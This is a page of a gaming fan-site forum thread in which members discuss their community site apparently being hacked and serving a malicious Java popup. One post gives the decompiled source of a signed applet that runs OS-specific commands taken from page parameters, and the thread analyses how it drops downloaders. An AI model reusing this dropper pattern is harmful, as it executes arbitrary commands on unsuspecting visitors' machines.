Discover Habbo's history
Treat yourself with a Secret Santa gift.... of a random Wiki page for you to start exploring Habbo's history!
Happy holidays!
Celebrate with us at Habbox on the hotel, on our Forum and right here!
Join Habbox!
One of us! One of us! Click here to see the roles you could take as part of the Habbox community!


Page 5 of 11 FirstFirst 123456789 ... LastLast
Results 41 to 50 of 110
  1. #41
    Join Date
    Oct 2005
    Location
    Spain, Valencia
    Posts
    20,492
    Tokens
    3,575
    Habbo
    GoldenMerc

    Latest Awards:

    Default

    AVG most likely blocked it for you, the site's not very interesting to be fair. no pages work tried going through them all

  2. #42
    Join Date
    Feb 2010
    Location
    Kentucky (USA)
    Posts
    869
    Tokens
    3,435
    Habbo
    Logandyer45

    Latest Awards:

    Default

    I tried looking at the events. I need to know if there is any events going on.
    Joined Habbox Forum: 16-02-2010

    Former HabboxLive Senior DJ
    Former Content Staff
    Former Articles Staff
    Hannah is bae

  3. #43
    Join Date
    Oct 2005
    Location
    Spain, Valencia
    Posts
    20,492
    Tokens
    3,575
    Habbo
    GoldenMerc

    Latest Awards:

    Default

    Yeh that's defiantly not possible as the habbox.com domain is messed atm, well is for my provider may not be for yours

  4. #44
    Join Date
    Jul 2004
    Location
    UK
    Posts
    23,590
    Tokens
    33,601
    Habbo
    xxMATTGxx

    Latest Awards:

    Default

    Quote Originally Posted by Logandyer45 View Post
    I tried looking at the events. I need to know if there is any events going on.
    It would be best to look at the community notice board in regards of events!


    Previous Habbox Roles
    Co-Owner of Habbox | General Manager | Assistant General Manager (Staff) | Forum Manager | Super Moderator | Forum Moderator

  5. #45
    Join Date
    May 2007
    Posts
    10,481
    Tokens
    3,140

    Latest Awards:

    Default

    It's actually pretty easy to get on the main site if you really need it for some reason http://146.185.20.107/#!/Home
    Chippiewill.


  6. #46
    Join Date
    Dec 2006
    Location
    UK
    Posts
    6,444
    Tokens
    6,671

    Latest Awards:

    Default

    whoever it is his name is phil

  7. #47
    Join Date
    Feb 2010
    Posts
    21,020
    Tokens
    49,520
    Habbo
    Samanfa

    Latest Awards:

    Default

    Quote Originally Posted by Stephen! View Post
    whoever it is his name is phil
    @Dilusionate; what you been doing to Habbox?

  8. #48
    Join Date
    May 2005
    Location
    /etc/passwd
    Posts
    19,110
    Tokens
    1,139

    Latest Awards:

    Default

    I've been looking into the Java popup used on their site.

    It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.
    Quote Originally Posted by Chippiewill View Post
    e-rebel forum moderator
    :8

  9. #49
    Join Date
    Aug 2006
    Location
    London
    Posts
    7,392
    Tokens
    0

    Latest Awards:

    Default

    A further problem made 10x worse by Habbox's owners being inactive, how many times to people need to say it GIVE xxMATTGxx ACCESS TO THE LOT.
    "You live more riding bikes like these for 5 minutes than most people do in their entire lives"

    RIP Marco Simoncelli ~ 1987 - 2011
    Previous Habbox Roles: Shows Manager, Help Desk Manager, Forum Moderator, Forum Super Moderator, Assistant Forum Manager, Forum Manager, Assistant General Manager (Staff), General Manager.

    Retired from Habbox May 2011


  10. #50
    Join Date
    Jun 2005
    Posts
    4,795
    Tokens
    0

    Latest Awards:

    Default

    There is no java exploit. Here is the decompiled code:

    Code:
    import java.applet.Applet;
    import java.io.IOException;
    
    
    public class Client extends Applet
    {
      public void init()
      {
        String window1 = getParameter("windows1");
        String windows2 = getParameter("windows2");
        String linux1 = getParameter("linux1");
        String linux2 = getParameter("linux2");
        String unix1 = getParameter("unix1");
        String unix2 = getParameter("unix2");
        String os = System.getProperty("os.name").toLowerCase();
    
    
        if (os.indexOf("win") >= 0)
        {
          try
          {
            Process w1 = Runtime.getRuntime().exec(window1);
            w2 = Runtime.getRuntime().exec(windows2);
          }
          catch (IOException e)
          {
            Process w2;
            e.printStackTrace();
          }
    
    
        }
    
    
        if (os.indexOf("mac") >= 0)
        {
          try
          {
            Process u1 = Runtime.getRuntime().exec(unix1);
            u2 = Runtime.getRuntime().exec(unix2);
          }
          catch (IOException e)
          {
            Process u2;
            e.printStackTrace();
          }
    
    
        }
    
    
        if (os.indexOf("lin") < 0) {
          return;
        }
        try
        {
          Process l1 = Runtime.getRuntime().exec(linux1);
          l2 = Runtime.getRuntime().exec(linux2);
        }
        catch (IOException e)
        {
          Process l2;
          e.printStackTrace();
        }
      }
    }
    Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

    Quote Originally Posted by Recursion View Post
    I've been looking into the Java popup used on their site.

    It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.

Page 5 of 11 FirstFirst 123456789 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •